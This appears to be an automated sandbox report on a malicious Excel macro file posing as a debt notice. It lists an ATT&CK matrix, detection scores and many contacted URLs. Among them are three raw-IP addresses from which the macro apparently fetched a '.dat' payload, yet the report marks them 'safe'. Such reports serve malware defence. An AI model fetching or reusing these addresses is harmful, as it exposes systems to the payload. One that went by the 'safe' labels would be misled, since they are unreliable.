Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting32Path InterceptionExtra Window Memory Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting32LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Extra Window Memory Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Outstanding-Debt-439798376-05042021.xlsm4%ReversingLabsDocument-Office.Trojan.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
http://45.153.229.23/44313,6048108796.dat5%VirustotalBrowse
http://45.153.229.23/44313,6048108796.dat0%Avira URL Cloudsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
http://5.34.179.36/44313,6048108796.dat0%Avira URL Cloudsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
http://91.211.91.81/44313,6048108796.dat0%Avira URL Cloudsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://45.153.229.23/44313,6048108796.datfalse
  • 5%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://5.34.179.36/44313,6048108796.datfalse
  • Avira URL Cloud: safe
unknown
http://91.211.91.81/44313,6048108796.datfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
    high
    https://login.microsoftonline.com/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
      high
      https://shell.suite.office.com:1443D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
          high
          https://autodiscover-s.outlook.com/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
              high
              https://cdn.entity.D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                    high
                    https://powerlift.acompli.netD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                      high
                      https://cortana.aiD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                high
                                https://api.aadrm.com/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                      high
                                      https://cr.office.comD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/OfficeD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                            high
                                            https://graph.ppe.windows.netD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                            high
                                                            https://graph.windows.netD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.comD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmediaD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.comD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                high
                                                                                                https://api.office.netD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.comD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policiesD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.comD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocationD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/logD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.comD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/importsD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.comD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v2D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/macD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.comD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.aiD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.comD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesD3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drfalse
                                                                                                                                                high

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                91.211.91.81
                                                                                                                                                unknownUkraine
                                                                                                                                                206638HOSTFORYUAfalse
                                                                                                                                                5.34.179.36
                                                                                                                                                unknownUkraine
                                                                                                                                                204957GREENFLOID-ASUAfalse
                                                                                                                                                45.153.229.23
                                                                                                                                                unknownRussian Federation
                                                                                                                                                25229VOLIA-ASUAfalse

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                Analysis ID:404106
                                                                                                                                                Start date:04.05.2021
                                                                                                                                                Start time:18:08:07
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 4m 51s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:light
                                                                                                                                                Sample file name:Outstanding-Debt-439798376-05042021.xlsm
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                Number of analysed new started processes analysed:24
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • GSI enabled (VBA)
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal60.expl.evad.winXLSM@1/10@0/3
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xlsm
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Scroll down
